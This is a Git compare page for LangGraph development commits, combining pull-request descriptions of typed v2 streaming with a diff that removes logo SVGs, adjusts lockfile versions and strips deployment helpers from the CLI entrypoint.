Compare commits

..
Author SHA1 Message Date
Sydney Runkle 33289349a9 sdk too 2026-03-03 14:24:30 -08:00
Sydney Runkle 727a9a1f6c flip 2026-03-03 14:23:04 -08:00
Sydney RunkleandGitHub dec15d13dc chore: parametrize StreamPart (#7009) 2026-03-03 13:40:16 -05:00
Sydney RunkleandGitHub f4a4c4b7b1 feat(langgraph): more robust pydantic + dataclass support for StateGraph (#6963)
## More robust Pydantic support for v2 streaming

When using `stream_version="v2"`, stream data and invoke results now
respect the graph's output/state schema types (Pydantic models,
dataclasses, etc.) instead of always returning raw dicts. This makes
working with typed state much more natural — no more manual
`Model(**chunk)` calls scattered through your code.

### Values stream coercion

`values` stream parts coerce data through the graph's output schema
mapper, so you get Pydantic models (or dataclasses) back directly:

```python
class MyState(BaseModel):
    value: str
    items: Annotated[list[str], operator.add]

graph = StateGraph(MyState).compile()

# v1: you get raw dicts back, have to reconstruct manually
for chunk in graph.stream(inputs, stream_mode="values"):
    state = MyState(**chunk)  # manual, error-prone

# v2: data is already a MyState instance
for part in graph.stream(inputs, stream_mode="values", stream_version="v2"):
    assert isinstance(part["data"], MyState)  # just works
    print(part["data"].value)                 # attribute access, IDE autocomplete
```

This also works for dataclass-based state schemas. TypedDict state stays
as plain dicts (no change needed).

### Interrupts on stream parts

`values` stream parts now carry an `interrupts` field directly, removing
the need to cross-reference the `updates` stream:

```python
for part in graph.stream(inputs, config, stream_mode="values", stream_version="v2"):
    if part["interrupts"]:
        # handle interrupts inline — no need to check updates stream
        for intr in part["interrupts"]:
            print(intr.value)
```

### Checkpoint/debug coercion

Checkpoint and debug stream payloads also coerce their `values` through
the state schema mapper, so `stream_mode="checkpoints"` and
`stream_mode="debug"` return typed state too.

### Generic stream types

`StreamPart`, `ValuesStreamPart`, `CheckpointPayload`, etc. are now
generic over `StateT`/`OutputT`, enabling better static type checking
across the board.

### `GraphOutput` wrapper

This adds a new return type to `invoke()` which is a meaningful API
surface change.

`invoke(stream_version="v2")` returns a `GraphOutput[OutputT]` dataclass
with `.value` and `.interrupts` fields:

```python
result = graph.invoke({"value": "x", "items": []}, stream_version="v2")

# typed access
assert isinstance(result, GraphOutput)
assert isinstance(result.value, MyState)  # coerced to schema type
assert result.interrupts == ()            # always available

# backward compat dict access still works
assert result["value"] == "x_a"
```

The concern: this changes the return type of `invoke()` in a way that
existing code patterns like `result["key"]` still work (via
`__getitem__`), but `isinstance(result, dict)` checks would break. Worth
discussing whether the ergonomic benefit justifies the migration cost.
2026-03-03 12:46:06 -05:00
Sydney RunkleandGitHub f73983e2fa Merge branch 'main' into 1.1 2026-02-27 09:38:29 -05:00
Sydney RunkleandGitHub 9023ad9931 feat(langgraph): backwards compat type safe streaming (#6931)
## Type-safe stream parts for v2 streaming

### Review recommendations

* Don't fear the diff! It's not so bad, I swear! The PR description
below gives a nice overview of changes
* Check out my explicit comments below, those should help to orient you
to the important changes :)
* On a first pass, ignore the test files! Just check out the new types,
overloads, and minor logical changes (diff behavior based on the flag)

## Summary

Adds a `stream_version="v2"` option that emits typed `{"type", "ns",
"data"}` dicts instead of raw tuples/SSE events. Each stream mode gets
its own `TypedDict` with a `Literal` type field, enabling full type
narrowing on `part["type"]`.

This is **opt in**, so it's **non-breaking**!!

```python
async for part in graph.astream(
    inputs, stream_mode=["messages", "custom"], stream_version="v2"
):
    if part["type"] == "messages":
        msg, metadata = part["data"]  # tuple[AnyMessage, dict] 
        print(msg.content)
    elif part["type"] == "custom":
        part["data"]  # Any 
```

Before v2 you'd get `tuple[str, Any]` with no way to narrow `data` based
on mode.

### What changed

**`langgraph` (core):** New `StreamPart` discriminated union + per-mode
TypedDicts in `types.py`. Stream-emit code in `pregel/` refactored to
use the new types. `RemoteGraph` gains a `stream_version` param.

**`sdk-py`:** Client-side v2 wrapper that converts SSE events into typed
dicts. No server API changes — v2 is purely a client-side rewrite of the
stream format.

### Stream part types

#### `langgraph` (core)

| `type` | `data` |
|---|---|
| `"values"` | `dict[str, Any]` — full state after each step |
| `"updates"` | `dict[str, Any]` — node name → output |
| `"messages"` | `tuple[AnyMessage, dict]` — message + metadata |
| `"custom"` | `Any` — whatever was passed to `StreamWriter` |
| `"tasks"` | `TaskPayload \| TaskResultPayload` |
| `"checkpoints"` | `CheckpointPayload` |
| `"debug"` | `DebugPayload` |

#### `sdk-py` (additional types from SSE events)

| `type` | `data` | Description |
|---|---|---|
| `"messages/partial"` | `list[dict]` | Partial message chunks |
| `"messages/complete"` | `list[dict]` | Complete messages |
| `"messages/metadata"` | `dict` | Message metadata |
| `"metadata"` | `RunMetadataPayload` | Run-level metadata (`run_id`,
etc.) |

All parts share the shape `{"type": Literal[...], "ns": list[str],
"data": ...}`.

## Release plan

* Release as a part of langgraph 1.1
* Before release, I'd like to do more experimentation with support for
pydantic + dataclasses and/or input/output runtime validation, as that
would help resolve the lack of typing for `values` mode.

### Notes

- Docs need a mass update to cover v2 streaming usage and the new types
- Changing the default `stream_version` to `"v2"` in a future release
would be breaking but backwards compatible (users can pin `"v1"` to keep
current behavior)
- I called out specifically relevant parts of the code in comments on
the PR :)
2026-02-27 09:37:09 -05:00
Sydney Runkle 353b0d8fb4 Merge branch 'main' of https://github.com/langchain-ai/langgraph 2026-02-25 09:34:09 -05:00
Sydney Runkle 2b9c63645e Merge branch 'main' of https://github.com/langchain-ai/langgraph 2026-02-24 15:31:37 -05:00
Sydney Runkle 54d0c94f54 Merge branch 'main' of https://github.com/langchain-ai/langgraph 2026-02-24 10:27:42 -05:00
Sydney Runkle 7d7bc0e42b Merge branch 'main' of https://github.com/langchain-ai/langgraph 2026-02-23 11:09:59 -05:00
Sydney Runkle bbc35a30f8 POC streaming hints 2026-02-23 09:09:13 -05:00
36 changed files with 3125 additions and 1945 deletions
-5
View File
@@ -1,5 +0,0 @@
<svg width="472" height="100" viewBox="0 0 472 100" fill="none" xmlns="http://www.w3.org/2000/svg">
<rect x="100" y="6.10352e-05" width="100" height="100" rx="20" transform="rotate(90 100 6.10352e-05)" fill="#161F34"/>
<path d="M32.1494 67.8579H45.2266C45.2246 75.0778 39.3716 80.93 32.1514 80.9302C24.9301 80.9301 19.0756 75.0762 19.0752 67.855C19.0752 60.6341 24.9288 54.78 32.1494 54.7788V67.8579ZM67.8691 54.7788C75.0906 54.779 80.9443 60.6335 80.9443 67.855C80.944 75.0762 75.0904 80.93 67.8691 80.9302C60.6488 80.9301 54.7949 75.0778 54.793 67.8579H67.8594V54.7788C67.8626 54.7788 67.8659 54.7788 67.8691 54.7788ZM67.8691 19.0757C75.0906 19.0759 80.9443 24.9304 80.9443 32.1519C80.944 39.3731 75.0904 45.2269 67.8691 45.2271C67.8659 45.2271 67.8626 45.2261 67.8594 45.2261V32.1479H54.793C54.795 24.9281 60.6489 19.0758 67.8691 19.0757ZM32.1514 19.0757C39.3716 19.0759 45.2246 24.9281 45.2266 32.1479H32.1494V45.2261C24.929 45.2249 19.0755 39.3725 19.0752 32.1519C19.0752 24.9303 24.9299 19.0758 32.1514 19.0757Z" fill="#7FC8FF"/>
<path d="M142.427 70.248V65.748H153.227V32.748H142.427V28.248H158.147V65.748H168.947V70.248H142.427ZM189.174 70.608C182.454 70.608 177.894 67.248 177.894 61.668C177.894 55.548 182.154 52.128 190.194 52.128H199.194V50.028C199.194 46.068 196.374 43.668 191.574 43.668C187.254 43.668 184.374 45.708 183.774 48.828H178.854C179.574 42.828 184.434 39.288 191.814 39.288C199.614 39.288 204.114 43.188 204.114 50.328V63.708C204.114 65.328 204.714 65.748 206.094 65.748H207.654V70.248H204.954C200.874 70.248 199.494 68.508 199.434 65.508C197.514 68.268 194.454 70.608 189.174 70.608ZM189.534 66.408C195.654 66.408 199.194 62.868 199.194 57.768V56.268H189.714C185.334 56.268 182.874 57.888 182.874 61.368C182.874 64.368 185.454 66.408 189.534 66.408ZM216.601 70.248V39.648H220.861L221.521 43.788C223.321 41.448 226.321 39.288 231.121 39.288C237.601 39.288 243.001 42.948 243.001 52.848V70.248H238.081V53.148C238.081 47.028 235.201 43.788 230.281 43.788C224.941 43.788 221.521 47.928 221.521 53.988V70.248H216.601ZM266.348 82.608C258.548 82.608 253.088 78.948 252.308 72.228H257.348C258.188 76.068 261.608 78.228 266.708 78.228C273.128 78.228 276.608 75.228 276.608 68.568V64.968C274.568 68.448 271.268 70.608 266.108 70.608C257.648 70.608 251.408 64.908 251.408 54.948C251.408 45.588 257.648 39.288 266.108 39.288C271.268 39.288 274.688 41.508 276.608 44.928L277.268 39.648H281.528V68.748C281.528 77.568 276.848 82.608 266.348 82.608ZM266.588 66.228C272.588 66.228 276.668 61.608 276.668 55.068C276.668 48.348 272.588 43.668 266.588 43.668C260.528 43.668 256.448 48.288 256.448 54.948C256.448 61.608 260.528 66.228 266.588 66.228ZM303.555 82.608C295.755 82.608 290.295 78.948 289.515 72.228H294.555C295.395 76.068 298.815 78.228 303.915 78.228C310.335 78.228 313.815 75.228 313.815 68.568V64.968C311.775 68.448 308.475 70.608 303.315 70.608C294.855 70.608 288.615 64.908 288.615 54.948C288.615 45.588 294.855 39.288 303.315 39.288C308.475 39.288 311.895 41.508 313.815 44.928L314.475 39.648H318.735V68.748C318.735 77.568 314.055 82.608 303.555 82.608ZM303.795 66.228C309.795 66.228 313.875 61.608 313.875 55.068C313.875 48.348 309.795 43.668 303.795 43.668C297.735 43.668 293.655 48.288 293.655 54.948C293.655 61.608 297.735 66.228 303.795 66.228ZM327.862 70.248V65.748H335.422V44.148H327.862V39.648H340.222V44.928C341.602 42.588 344.482 39.648 350.482 39.648H355.582V44.448H349.942C342.562 44.448 340.342 49.968 340.342 54.828V65.748H353.902V70.248H327.862ZM375.209 70.608C368.489 70.608 363.929 67.248 363.929 61.668C363.929 55.548 368.189 52.128 376.229 52.128H385.229V50.028C385.229 46.068 382.409 43.668 377.609 43.668C373.289 43.668 370.409 45.708 369.809 48.828H364.889C365.609 42.828 370.469 39.288 377.849 39.288C385.649 39.288 390.149 43.188 390.149 50.328V63.708C390.149 65.328 390.749 65.748 392.129 65.748H393.689V70.248H390.989C386.909 70.248 385.529 68.508 385.469 65.508C383.549 68.268 380.489 70.608 375.209 70.608ZM375.569 66.408C381.689 66.408 385.229 62.868 385.229 57.768V56.268H375.749C371.369 56.268 368.909 57.888 368.909 61.368C368.909 64.368 371.489 66.408 375.569 66.408ZM401.076 82.248V39.648H405.336L405.996 44.568C408.036 41.748 411.336 39.288 416.496 39.288C424.956 39.288 431.196 44.988 431.196 54.948C431.196 64.308 424.956 70.608 416.496 70.608C411.336 70.608 407.856 68.508 405.996 65.568V82.248H401.076ZM416.016 66.228C422.076 66.228 426.156 61.608 426.156 54.948C426.156 48.288 422.076 43.668 416.016 43.668C410.016 43.668 405.936 48.288 405.936 54.828C405.936 61.548 410.016 66.228 416.016 66.228ZM439.663 70.248V28.248H444.583V43.788C446.863 40.968 450.403 39.288 454.363 39.288C462.043 39.288 466.423 44.388 466.423 53.208V70.248H461.503V53.508C461.503 47.268 458.623 43.788 453.523 43.788C448.063 43.788 444.583 48.108 444.583 54.948V70.248H439.663Z" fill="white"/>
</svg>

Before

Width:  |  Height:  |  Size: 4.7 KiB

-5
View File
@@ -1,5 +0,0 @@
<svg width="472" height="100" viewBox="0 0 472 100" fill="none" xmlns="http://www.w3.org/2000/svg">
<rect x="100" width="100" height="100" rx="20" transform="rotate(90 100 0)" fill="#161F34"/>
<path d="M32.1494 67.8578H45.2266C45.2246 75.0776 39.3716 80.9299 32.1514 80.9301C24.9301 80.9299 19.0756 75.0761 19.0752 67.8549C19.0752 60.634 24.9288 54.7799 32.1494 54.7787V67.8578ZM67.8691 54.7787C75.0906 54.7789 80.9443 60.6334 80.9443 67.8549C80.944 75.076 75.0904 80.9299 67.8691 80.9301C60.6488 80.9299 54.7949 75.0777 54.793 67.8578H67.8594V54.7787C67.8626 54.7787 67.8659 54.7787 67.8691 54.7787ZM67.8691 19.0756C75.0906 19.0758 80.9443 24.9303 80.9443 32.1517C80.944 39.373 75.0904 45.2267 67.8691 45.2269C67.8659 45.2269 67.8626 45.226 67.8594 45.226V32.1478H54.793C54.795 24.928 60.6489 19.0757 67.8691 19.0756ZM32.1514 19.0756C39.3716 19.0757 45.2246 24.928 45.2266 32.1478H32.1494V45.226C24.929 45.2248 19.0755 39.3724 19.0752 32.1517C19.0752 24.9302 24.9299 19.0757 32.1514 19.0756Z" fill="#7FC8FF"/>
<path d="M142.427 70.248V65.748H153.227V32.748H142.427V28.248H158.147V65.748H168.947V70.248H142.427ZM189.174 70.608C182.454 70.608 177.894 67.248 177.894 61.668C177.894 55.548 182.154 52.128 190.194 52.128H199.194V50.028C199.194 46.068 196.374 43.668 191.574 43.668C187.254 43.668 184.374 45.708 183.774 48.828H178.854C179.574 42.828 184.434 39.288 191.814 39.288C199.614 39.288 204.114 43.188 204.114 50.328V63.708C204.114 65.328 204.714 65.748 206.094 65.748H207.654V70.248H204.954C200.874 70.248 199.494 68.508 199.434 65.508C197.514 68.268 194.454 70.608 189.174 70.608ZM189.534 66.408C195.654 66.408 199.194 62.868 199.194 57.768V56.268H189.714C185.334 56.268 182.874 57.888 182.874 61.368C182.874 64.368 185.454 66.408 189.534 66.408ZM216.601 70.248V39.648H220.861L221.521 43.788C223.321 41.448 226.321 39.288 231.121 39.288C237.601 39.288 243.001 42.948 243.001 52.848V70.248H238.081V53.148C238.081 47.028 235.201 43.788 230.281 43.788C224.941 43.788 221.521 47.928 221.521 53.988V70.248H216.601ZM266.348 82.608C258.548 82.608 253.088 78.948 252.308 72.228H257.348C258.188 76.068 261.608 78.228 266.708 78.228C273.128 78.228 276.608 75.228 276.608 68.568V64.968C274.568 68.448 271.268 70.608 266.108 70.608C257.648 70.608 251.408 64.908 251.408 54.948C251.408 45.588 257.648 39.288 266.108 39.288C271.268 39.288 274.688 41.508 276.608 44.928L277.268 39.648H281.528V68.748C281.528 77.568 276.848 82.608 266.348 82.608ZM266.588 66.228C272.588 66.228 276.668 61.608 276.668 55.068C276.668 48.348 272.588 43.668 266.588 43.668C260.528 43.668 256.448 48.288 256.448 54.948C256.448 61.608 260.528 66.228 266.588 66.228ZM303.555 82.608C295.755 82.608 290.295 78.948 289.515 72.228H294.555C295.395 76.068 298.815 78.228 303.915 78.228C310.335 78.228 313.815 75.228 313.815 68.568V64.968C311.775 68.448 308.475 70.608 303.315 70.608C294.855 70.608 288.615 64.908 288.615 54.948C288.615 45.588 294.855 39.288 303.315 39.288C308.475 39.288 311.895 41.508 313.815 44.928L314.475 39.648H318.735V68.748C318.735 77.568 314.055 82.608 303.555 82.608ZM303.795 66.228C309.795 66.228 313.875 61.608 313.875 55.068C313.875 48.348 309.795 43.668 303.795 43.668C297.735 43.668 293.655 48.288 293.655 54.948C293.655 61.608 297.735 66.228 303.795 66.228ZM327.862 70.248V65.748H335.422V44.148H327.862V39.648H340.222V44.928C341.602 42.588 344.482 39.648 350.482 39.648H355.582V44.448H349.942C342.562 44.448 340.342 49.968 340.342 54.828V65.748H353.902V70.248H327.862ZM375.209 70.608C368.489 70.608 363.929 67.248 363.929 61.668C363.929 55.548 368.189 52.128 376.229 52.128H385.229V50.028C385.229 46.068 382.409 43.668 377.609 43.668C373.289 43.668 370.409 45.708 369.809 48.828H364.889C365.609 42.828 370.469 39.288 377.849 39.288C385.649 39.288 390.149 43.188 390.149 50.328V63.708C390.149 65.328 390.749 65.748 392.129 65.748H393.689V70.248H390.989C386.909 70.248 385.529 68.508 385.469 65.508C383.549 68.268 380.489 70.608 375.209 70.608ZM375.569 66.408C381.689 66.408 385.229 62.868 385.229 57.768V56.268H375.749C371.369 56.268 368.909 57.888 368.909 61.368C368.909 64.368 371.489 66.408 375.569 66.408ZM401.076 82.248V39.648H405.336L405.996 44.568C408.036 41.748 411.336 39.288 416.496 39.288C424.956 39.288 431.196 44.988 431.196 54.948C431.196 64.308 424.956 70.608 416.496 70.608C411.336 70.608 407.856 68.508 405.996 65.568V82.248H401.076ZM416.016 66.228C422.076 66.228 426.156 61.608 426.156 54.948C426.156 48.288 422.076 43.668 416.016 43.668C410.016 43.668 405.936 48.288 405.936 54.828C405.936 61.548 410.016 66.228 416.016 66.228ZM439.663 70.248V28.248H444.583V43.788C446.863 40.968 450.403 39.288 454.363 39.288C462.043 39.288 466.423 44.388 466.423 53.208V70.248H461.503V53.508C461.503 47.268 458.623 43.788 453.523 43.788C448.063 43.788 444.583 48.108 444.583 54.948V70.248H439.663Z" fill="#161F34"/>
</svg>

Before

Width:  |  Height:  |  Size: 4.7 KiB

+3 -6
View File
@@ -1,7 +1,7 @@
<picture class="github-only">
<source media="(prefers-color-scheme: light)" srcset=".github/images/logo-light.svg">
<source media="(prefers-color-scheme: dark)" srcset=".github/images/logo-dark.svg">
<img alt="LangGraph Logo" src=".github/images/logo-dark.svg" width="50%">
<source media="(prefers-color-scheme: light)" srcset="https://langchain-ai.github.io/langgraph/static/wordmark_dark.svg">
<source media="(prefers-color-scheme: dark)" srcset="https://langchain-ai.github.io/langgraph/static/wordmark_light.svg">
<img alt="LangGraph Logo" src="https://langchain-ai.github.io/langgraph/static/wordmark_dark.svg" width="80%">
</picture>
<div>
@@ -56,9 +56,6 @@ Get started with the [LangGraph Quickstart](https://docs.langchain.com/oss/pytho
To quickly build agents with LangChain's `create_agent` (built on LangGraph), see the [LangChain Agents documentation](https://docs.langchain.com/oss/python/langchain/agents).
> [!TIP]
> For developing, debugging, and deploying AI agents and LLM applications, see [LangSmith](https://docs.langchain.com/langsmith/home).
## Core benefits
LangGraph provides low-level supporting infrastructure for *any* long-running, stateful workflow or agent. LangGraph does not abstract prompts or architecture, and provides the following central benefits:
+1 -1
View File
@@ -259,7 +259,7 @@ wheels = [
[[package]]
name = "langgraph-checkpoint"
version = "4.0.1"
version = "4.0.1rc4"
source = { editable = "../checkpoint" }
dependencies = [
{ name = "langchain-core" },
+1 -1
View File
@@ -268,7 +268,7 @@ wheels = [
[[package]]
name = "langgraph-checkpoint"
version = "4.0.1"
version = "4.0.1rc4"
source = { editable = "../checkpoint" }
dependencies = [
{ name = "langchain-core" },
+1 -1
View File
@@ -4,7 +4,7 @@ build-backend = "hatchling.build"
[project]
name = "langgraph-checkpoint"
version = "4.0.1"
version = "4.0.1rc4"
description = "Library with base interfaces for LangGraph checkpoint savers."
authors = []
requires-python = ">=3.10"
+1 -1
View File
@@ -286,7 +286,7 @@ wheels = [
[[package]]
name = "langgraph-checkpoint"
version = "4.0.1"
version = "4.0.1rc4"
source = { editable = "." }
dependencies = [
{ name = "langchain-core" },
+14 -14
View File
@@ -1555,10 +1555,10 @@ brace-expansion@^1.1.7:
balanced-match "^1.0.0"
concat-map "0.0.1"
brace-expansion@^2.0.2:
version "2.0.2"
resolved "https://registry.yarnpkg.com/brace-expansion/-/brace-expansion-2.0.2.tgz#54fc53237a613d854c7bd37463aad17df87214e7"
integrity sha512-Jt0vHyM+jmUBqojB7E1NIYadt0vI0Qxjxd2TErW94wDz+E2LAm5vKMXXwg6ZZBTHPuUlDgQHKXvjGBdfcF1ZDQ==
brace-expansion@^2.0.1:
version "2.0.1"
resolved "https://registry.yarnpkg.com/brace-expansion/-/brace-expansion-2.0.1.tgz#1edc459e0f0c548486ecf9fc99f2221364b9a0ae"
integrity sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==
dependencies:
balanced-match "^1.0.0"
@@ -3700,25 +3700,25 @@ mimic-fn@^2.1.0:
integrity sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==
minimatch@^10.2.1:
version "10.2.4"
resolved "https://registry.yarnpkg.com/minimatch/-/minimatch-10.2.4.tgz#465b3accbd0218b8281f5301e27cedc697f96fde"
integrity sha512-oRjTw/97aTBN0RHbYCdtF1MQfvusSIBQM0IZEgzl6426+8jSC0nF1a/GmnVLpfB9yyr6g6FTqWqiZVbxrtaCIg==
version "10.2.2"
resolved "https://registry.yarnpkg.com/minimatch/-/minimatch-10.2.2.tgz#361603ee323cfb83496fea2ae17cc44ea4e1f99f"
integrity sha512-+G4CpNBxa5MprY+04MbgOw1v7So6n5JY166pFi9KfYwT78fxScCeSNQSNzp6dpPSW2rONOps6Ocam1wFhCgoVw==
dependencies:
brace-expansion "^5.0.2"
minimatch@^3.0.4, minimatch@^3.1.1, minimatch@^3.1.2:
version "3.1.5"
resolved "https://registry.yarnpkg.com/minimatch/-/minimatch-3.1.5.tgz#580c88f8d5445f2bd6aa8f3cadefa0de79fbd69e"
integrity sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==
version "3.1.2"
resolved "https://registry.yarnpkg.com/minimatch/-/minimatch-3.1.2.tgz#19cd194bfd3e428f049a70817c038d89ab4be35b"
integrity sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==
dependencies:
brace-expansion "^1.1.7"
minimatch@^9.0.4, minimatch@^9.0.5:
version "9.0.9"
resolved "https://registry.yarnpkg.com/minimatch/-/minimatch-9.0.9.tgz#9b0cb9fcb78087f6fd7eababe2511c4d3d60574e"
integrity sha512-OBwBN9AL4dqmETlpS2zasx+vTeWclWzkblfZk7KTA5j3jeOONz/tRCnZomUyvNg83wL5Zv9Ss6HMJXAgL8R2Yg==
version "9.0.5"
resolved "https://registry.yarnpkg.com/minimatch/-/minimatch-9.0.5.tgz#d74f9dd6b57d83d8e98cfb82133b03978bc929e5"
integrity sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==
dependencies:
brace-expansion "^2.0.2"
brace-expansion "^2.0.1"
minimist@^1.2.0, minimist@^1.2.5, minimist@^1.2.6:
version "1.2.8"
+11 -11
View File
@@ -434,7 +434,7 @@ brace-expansion@^1.1.7:
balanced-match "^1.0.0"
concat-map "0.0.1"
brace-expansion@^2.0.2:
brace-expansion@^2.0.1:
version "2.0.2"
resolved "https://registry.yarnpkg.com/brace-expansion/-/brace-expansion-2.0.2.tgz#54fc53237a613d854c7bd37463aad17df87214e7"
integrity sha512-Jt0vHyM+jmUBqojB7E1NIYadt0vI0Qxjxd2TErW94wDz+E2LAm5vKMXXwg6ZZBTHPuUlDgQHKXvjGBdfcF1ZDQ==
@@ -1380,25 +1380,25 @@ math-intrinsics@^1.1.0:
integrity sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==
minimatch@^10.2.1:
version "10.2.4"
resolved "https://registry.yarnpkg.com/minimatch/-/minimatch-10.2.4.tgz#465b3accbd0218b8281f5301e27cedc697f96fde"
integrity sha512-oRjTw/97aTBN0RHbYCdtF1MQfvusSIBQM0IZEgzl6426+8jSC0nF1a/GmnVLpfB9yyr6g6FTqWqiZVbxrtaCIg==
version "10.2.2"
resolved "https://registry.yarnpkg.com/minimatch/-/minimatch-10.2.2.tgz#361603ee323cfb83496fea2ae17cc44ea4e1f99f"
integrity sha512-+G4CpNBxa5MprY+04MbgOw1v7So6n5JY166pFi9KfYwT78fxScCeSNQSNzp6dpPSW2rONOps6Ocam1wFhCgoVw==
dependencies:
brace-expansion "^5.0.2"
minimatch@^3.1.2:
version "3.1.5"
resolved "https://registry.yarnpkg.com/minimatch/-/minimatch-3.1.5.tgz#580c88f8d5445f2bd6aa8f3cadefa0de79fbd69e"
integrity sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==
version "3.1.2"
resolved "https://registry.yarnpkg.com/minimatch/-/minimatch-3.1.2.tgz#19cd194bfd3e428f049a70817c038d89ab4be35b"
integrity sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==
dependencies:
brace-expansion "^1.1.7"
minimatch@^9.0.5:
version "9.0.9"
resolved "https://registry.yarnpkg.com/minimatch/-/minimatch-9.0.9.tgz#9b0cb9fcb78087f6fd7eababe2511c4d3d60574e"
integrity sha512-OBwBN9AL4dqmETlpS2zasx+vTeWclWzkblfZk7KTA5j3jeOONz/tRCnZomUyvNg83wL5Zv9Ss6HMJXAgL8R2Yg==
version "9.0.5"
resolved "https://registry.yarnpkg.com/minimatch/-/minimatch-9.0.5.tgz#d74f9dd6b57d83d8e98cfb82133b03978bc929e5"
integrity sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==
dependencies:
brace-expansion "^2.0.2"
brace-expansion "^2.0.1"
minimist@^1.2.0, minimist@^1.2.6:
version "1.2.8"
+1 -1
View File
@@ -1 +1 @@
__version__ = "0.4.14"
__version__ = "0.4.13"
+5 -686
View File
@@ -1,23 +1,14 @@
"""CLI entrypoint for LangGraph API server."""
import base64
import copy
import json as json_mod
import os
import pathlib
import platform
import re
import shutil
import sys
import tempfile
import time
from collections.abc import Callable, Sequence
from contextlib import contextmanager
import click
import click.exceptions
from click import secho
from dotenv import dotenv_values
import langgraph_cli.config
import langgraph_cli.docker
@@ -26,131 +17,11 @@ from langgraph_cli.config import Config
from langgraph_cli.constants import DEFAULT_CONFIG, DEFAULT_PORT
from langgraph_cli.docker import DockerCapabilities
from langgraph_cli.exec import Runner, subp_exec
from langgraph_cli.host_backend import HostBackendClient, HostBackendError
from langgraph_cli.progress import Progress
from langgraph_cli.templates import TEMPLATE_HELP_STRING, create_new
from langgraph_cli.util import warn_non_wolfi_distro
from langgraph_cli.version import __version__
RESERVED_ENV_VARS = frozenset(
[
# LANGCHAIN_RESERVED_ENV_VARS from host-backend
"LANGCHAIN_TRACING_V2",
"LANGSMITH_TRACING_V2",
"LANGCHAIN_ENDPOINT",
"LANGCHAIN_PROJECT",
"LANGSMITH_PROJECT",
"LANGSMITH_LANGGRAPH_GIT_REPO",
"LANGGRAPH_GIT_REPO_PATH",
"LANGCHAIN_API_KEY",
"LANGSMITH_CONTROL_PLANE_API_KEY",
"POSTGRES_URI",
"POSTGRES_PASSWORD",
"DATABASE_URI",
"LANGSMITH_LANGGRAPH_GIT_REF",
"LANGSMITH_LANGGRAPH_GIT_REF_SHA",
"LANGGRAPH_AUTH_TYPE",
"LANGSMITH_AUTH_ENDPOINT",
"LANGSMITH_TENANT_ID",
"LANGSMITH_AUTH_VERIFY_TENANT_ID",
"LANGSMITH_HOST_PROJECT_ID",
"LANGSMITH_HOST_PROJECT_NAME",
"LANGSMITH_HOST_REVISION_ID",
"LOG_JSON",
"LOG_DICT_TRACEBACKS",
"REDIS_URI",
"LANGCHAIN_CALLBACKS_BACKGROUND",
"DD_TRACE_PSYCOPG_ENABLED",
"DD_TRACE_REDIS_ENABLED",
"LANGSMITH_DEPLOYMENT_NAME",
"LANGGRAPH_CLOUD_LICENSE_KEY",
# ALLOWED_SELF_HOSTED_ENV_VARS (rejected for non-self-hosted)
"LANGSMITH_API_KEY",
"LANGSMITH_ENDPOINT",
"POSTGRES_URI_CUSTOM",
"REDIS_URI_CUSTOM",
"PATH",
"PORT",
"MOUNT_PREFIX",
"LSD_ENV",
"LSD_DD_API_KEY",
"LSD_DD_ENDPOINT",
"LSD_DEPLOYMENT_TYPE",
]
)
_API_KEY_ENV_NAMES = (
"LANGGRAPH_HOST_API_KEY",
"LANGSMITH_API_KEY",
"LANGCHAIN_API_KEY",
)
_DEPLOYMENT_NAME_ENV = "LANGSMITH_DEPLOYMENT_NAME"
def _parse_env_from_config(
config_json: dict, config_path: pathlib.Path
) -> dict[str, str]:
"""Resolve env vars from langgraph.json 'env' field or a .env fallback."""
env_field = config_json.get("env")
# validate_config_file will default env to {}
if isinstance(env_field, dict) and env_field:
return {str(k): str(v) for k, v in env_field.items()}
if isinstance(env_field, str):
env_path = (config_path.parent / env_field).resolve()
if not env_path.exists():
click.secho(
f"Warning: env file '{env_field}' specified in langgraph.json not found.",
fg="yellow",
)
return {}
else:
env_path = pathlib.Path.cwd() / ".env"
return {k: v for k, v in dotenv_values(env_path).items() if v is not None}
def _secrets_from_env(
env_vars: dict[str, str],
) -> list[dict[str, str]]:
"""Convert env dict to secrets list, filtering reserved vars with warnings."""
secrets: list[dict[str, str]] = []
for name, value in env_vars.items():
if name in RESERVED_ENV_VARS:
click.secho(f" Skipping reserved env var: {name}", fg="yellow")
continue
if not value:
continue
secrets.append({"name": name, "value": value})
return secrets
_TERMINAL_STATUSES = frozenset(
[
"DEPLOYED",
"CREATE_FAILED",
"BUILD_FAILED",
"DEPLOY_FAILED",
"SKIPPED",
]
)
@contextmanager
def _docker_config_for_token(registry_host: str, token: str):
"""Create a temporary Docker config with only the push token.
Yields the path to a temporary config directory that can be passed
to ``docker --config <path>`` so that system credential helpers
(e.g. gcloud) don't interfere with the push token.
"""
auth_b64 = base64.b64encode(f"oauth2accesstoken:{token}".encode()).decode()
config_data = {"auths": {registry_host: {"auth": auth_b64}}}
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, "config.json"), "w") as f:
json_mod.dump(config_data, f)
yield tmpdir
OPT_DOCKER_COMPOSE = click.option(
"--docker-compose",
"-d",
@@ -433,9 +304,6 @@ def _build(
